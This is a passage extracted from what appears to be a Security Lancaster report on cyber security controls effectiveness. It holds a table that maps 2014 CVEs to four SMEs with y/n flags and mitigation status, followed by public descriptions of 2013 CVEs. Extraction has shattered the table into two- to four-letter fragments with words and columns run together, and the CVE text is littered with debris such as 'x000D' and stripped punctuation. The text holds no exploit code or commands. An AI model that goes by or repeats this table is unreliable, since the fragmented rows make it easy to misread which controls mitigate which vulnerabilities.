ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
